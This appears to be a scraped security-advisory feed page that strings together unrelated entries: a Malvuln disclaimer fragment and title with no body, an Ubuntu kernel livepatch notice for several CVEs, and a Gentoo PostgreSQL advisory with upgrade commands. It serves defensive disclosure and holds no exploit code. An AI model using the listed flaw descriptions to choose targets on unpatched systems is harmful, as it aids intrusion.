misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Oblivion.01.a MVID-2022-0658 Insecure Transit

David Bouman discovered that the netfilter subsystem in the Linux kernel did not properly validate passed user register indices. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Bouman and Billy Jheng Bing Jhong discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not properly validate passed user register indices. A local attacker  
could use this to cause a denial of service or possibly execute  
arbitrary code. (CVE-2022-1015)

David Bouman and Billy Jheng Bing Jhong discovered that a race condition  
existed in the io_uring subsystem in the Linux kernel, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-2602)

Sönke Huster discovered that an integer overflow vulnerability existed  
in the WiFi driver stack in the Linux kernel, leading to a buffer  
overflow. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41674)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly perform reference counting in some situations, leading to a  
use-after-free vulnerability. A physically proximate attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-42720)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly handle BSSID/SSID lists in some situations. A physically  
proximate attacker could use this to cause a denial of service (infinite  
loop). (CVE-2022-42721)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
physically proximate attacker could use this to cause a denial of service  
(system crash). (CVE-2022-42722)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 90.2  
    aws - 90.3  
    azure - 90.2  
    gcp - 90.2  
    gcp - 90.3  
    generic - 90.2  
    gke - 90.2  
    gke - 90.3  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 18.04 LTS  
    aws - 90.2  
    azure - 90.2  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.2  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 22.04 LTS  
    aws - 90.1  
    aws - 90.2  
    azure - 90.1  
    azure - 90.2  
    gcp - 90.1  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.1  
    gke - 90.2  
    ibm - 90.1  
    ibm - 90.2  
    lowlatency - 90.2

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-aws - 4.15.0-1119  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2022-1015  
-   CVE-2022-2602  
-   CVE-2022-41674  
-   CVE-2022-42720  
-   CVE-2022-42721  
-   CVE-2022-42722

Kernel Live Patch Security Notice LSN-0090-1

Gentoo Linux Security Advisory 202211-4 - Multiple vulnerabilities have been found in PostgreSQL, the worst of which could result in remote code execution. Versions greater than or equal to 10.22:10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High  
   Title: PostgreSQL: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #793734, #808984, #823125, #865255  
      ID: 202211-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in PostgreSQL, the worst of  
which could result in remote code execution.

Background  
==========

PostgreSQL is an open source object-relational database management  
system.

Affected packages  
=================

-------------------------------------------------------------------  
Package              /     Vulnerable     /            Unaffected  
-------------------------------------------------------------------  
dev-db/postgresql    < 10.22                >= 10.22:10  
                                 < 11.17:11           >= 11.17:11  
                                 < 12.12:12           >= 12.12:12  
                                 < 13.8:13             >= 13.8:13  
                                 < 14.5:14             >= 14.5

Description  
===========

Multiple vulnerabilities have been discovered in PostgreSQL. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All PostgreSQL 10.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-10.22:10"

All PostgreSQL 11.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-11.17:11"

All PostgreSQL 12.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-12.12:12"

All PostgreSQL 13.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-13.8:13"

All PostgreSQL 14.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-14.5:14"

References  
==========

[ 1 ] CVE-2021-3677  
     https://nvd.nist.gov/vuln/detail/CVE-2021-3677  
[ 2 ] CVE-2021-23214  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23214  
[ 3 ] CVE-2021-23222  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23222  
[ 4 ] CVE-2021-32027  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32027  
[ 5 ] CVE-2021-32028  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32028  
[ 6 ] CVE-2022-1552  
     https://nvd.nist.gov/vuln/detail/CVE-2022-1552  
[ 7 ] CVE-2022-2625  
     https://nvd.nist.gov/vuln/detail/CVE-2022-2625

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm